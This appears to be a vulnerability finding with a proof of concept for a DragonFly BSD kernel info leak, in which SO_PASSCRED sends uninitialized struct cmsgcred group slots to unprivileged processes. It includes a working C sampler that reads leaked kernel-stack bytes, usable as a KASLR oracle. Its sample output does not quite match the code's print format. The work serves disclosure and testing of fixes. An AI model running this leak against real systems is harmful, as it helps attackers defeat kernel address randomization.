# DF-0010 — PoC

`leak_cmsgcred.c` — unprivileged leak of kernel-stack bytes via the
uninitialized `struct cmsgcred` synthesized by `SO_PASSCRED`.

## The issue

In `uipc_send()` (`sys/kern/uipc_usrreq.c:680-700`), for an AF_UNIX `SOCK_DGRAM`
socket whose receiver has `SO_PASSCRED` set, when the sender attached no `SCM_CREDS`
control message:

```c
struct cmsgcred cred;                 /* :683  uninitialized               */
...
ncon = sbcreatecontrol(&cred, sizeof(cred), SCM_CREDS, SOL_SOCKET); /* :695 */
unp_internalize(ncon, msg->send.nm_td);
```

`sbcreatecontrol` copies `sizeof(cred)` bytes of stack garbage into the mbuf;
the `SCM_CREDS` case of `unp_internalize` (`uipc_usrreq.c:1734-1744`) only fills
`cmcred_pid/uid/euid/gid/ngroups` and `groups[0..ngroups-1]`. The tail
`groups[ngroups..CMGROUP_MAX-1]` (up to 15*4 = 60 bytes when the sender has a
single group) retains the leaked kernel-stack bytes and is delivered to the
receiver via `recvmsg`.
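The steps above as a stand-alone sampler, added here as an example and not the repository's `leak_cmsgcred.c`: it pairs two AF_UNIX datagram sockets, sets `SO_PASSCRED` on the receiver, sends one byte with no control message and parses the synthesized `SCM_CREDS`. The two helpers (`unfilled_bytes`, `count_nonzero_unfilled`) are portable and take `CMGROUP_MAX == 16` as an assumption; the sampling path is compiled only under `__DragonFly__` and uses `SOL_SOCKET`/`SO_PASSCRED` exactly as described above. All function and variable names are this example's own.

```c
/* Added example, not the repository's leak_cmsgcred.c.  Samples the SCM_CREDS
 * message that SO_PASSCRED synthesizes for a datagram sent without credentials
 * and inspects the group slots the kernel never filled.  Assumes DragonFly's
 * struct cmsgcred and CMGROUP_MAX == 16. */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#ifndef CMGROUP_MAX
#define CMGROUP_MAX 16   /* DragonFly value; assumed when building elsewhere */
#endif

/* Bytes of cmcred_groups[] that unp_internalize() never writes for a sender
 * belonging to `ngroups` groups (ngroups == 1 gives the 60 bytes above). */
size_t unfilled_bytes(int ngroups)
{
    if (ngroups < 0 || ngroups > CMGROUP_MAX)
        return 0;
    return (size_t)(CMGROUP_MAX - ngroups) * sizeof(uint32_t);
}

/* Count unfilled group words that are nonzero: a fixed kernel gives 0,
 * leaked stack residue gives > 0 on most samples. */
int count_nonzero_unfilled(const uint32_t *groups, int ngroups)
{
    int n = 0;
    for (int i = ngroups; i < CMGROUP_MAX; i++)
        if (groups[i] != 0)
            n++;
    return n;
}

#if defined(__DragonFly__)
/* One sample: datagram socketpair, SO_PASSCRED on the receiver, a one-byte
 * send() with no control data, then recvmsg().  Copies the synthesized
 * struct cmsgcred to *out.  Returns 0 on success, 1 if no SCM_CREDS
 * arrived, -1 on a syscall error. */
int sample_once(struct cmsgcred *out)
{
    int sv[2], on = 1, rc = -1;
    char payload = 'x';
    struct iovec iov = { &payload, 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(struct cmsgcred))]; } ctl;
    struct msghdr msg;
    struct cmsghdr *cm;

    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0)
        return -1;
    if (setsockopt(sv[1], SOL_SOCKET, SO_PASSCRED, &on, sizeof(on)) < 0)
        goto out;
    if (send(sv[0], &payload, 1, 0) != 1)          /* no SCM_CREDS attached */
        goto out;
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctl.buf;
    msg.msg_controllen = sizeof(ctl.buf);
    if (recvmsg(sv[1], &msg, 0) < 0)
        goto out;
    rc = 1;
    for (cm = CMSG_FIRSTHDR(&msg); cm != NULL; cm = CMSG_NXTHDR(&msg, cm)) {
        if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_CREDS &&
            cm->cmsg_len >= CMSG_LEN(sizeof(struct cmsgcred))) {
            memcpy(out, CMSG_DATA(cm), sizeof(*out));
            rc = 0;
            break;
        }
    }
out:
    close(sv[0]);
    close(sv[1]);
    return rc;
}
#endif

int main(void)
{
#if defined(__DragonFly__)
    struct cmsgcred cred;
    int leaked = 0;

    for (int s = 0; s < 8; s++) {       /* several samples: one zero sample proves nothing */
        if (sample_once(&cred) != 0) {
            perror("sample_once");
            return 1;
        }
        int ng = cred.cmcred_ngroups;
        int nz = count_nonzero_unfilled((const uint32_t *)cred.cmcred_groups, ng);
        printf("sample %d: pid=%ld uid=%ld ngroups=%d unfilled=%zu bytes, nonzero unfilled words=%d\n",
               s, (long)cred.cmcred_pid, (long)cred.cmcred_uid, ng, unfilled_bytes(ng), nz);
        for (int i = ng; i < CMGROUP_MAX; i++)
            printf("  groups[%d] = 0x%08x\n", i, (unsigned)cred.cmcred_groups[i]);
        leaked += nz;
    }
    puts(leaked ? "result: LEAK CONFIRMED (kernel-stack bytes in unfilled groups)"
                : "result: unfilled groups read as zero in all samples");
    return 0;
#else
    puts("sampling needs DragonFly's SCM_CREDS/struct cmsgcred; only the helpers are built here");
    return 0;
#endif
}
```

A fixed kernel should report `nonzero unfilled words=0` across all eight samples; any nonzero slot, in particular values that look like kernel addresses, reproduces the leak. The sampler only reads its own socketpair, so it runs as an ordinary unprivileged user.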

## Build

```
cc -o leak_cmsgcred findings/poc/DF-0010/leak_cmsgcred.c
```

## Run

As an **unprivileged** user:

```
./leak_cmsgcred
```

## Expected output (bug present)

```
sample 0: pid=... uid=... ... ngroups=1
  filled groups [0..0] = { <gid> }
  UNFILLED groups [1..15] = { 0x<..> 0x<..> ... }     <-- leaked kernel stack
result: LEAK CONFIRMED (kernel-stack bytes in unfilled groups)
```

The unfilled group words vary across runs and are kernel-stack residue
(pointer fragments and the like), which makes them a samplable KASLR/stack-residue
oracle. On a fixed kernel they read as zero. Take several samples before
concluding either way: a single all-zero tail can be residue that happened to
be zero, so only consistently zero tails across repeated runs indicate a fixed
kernel.
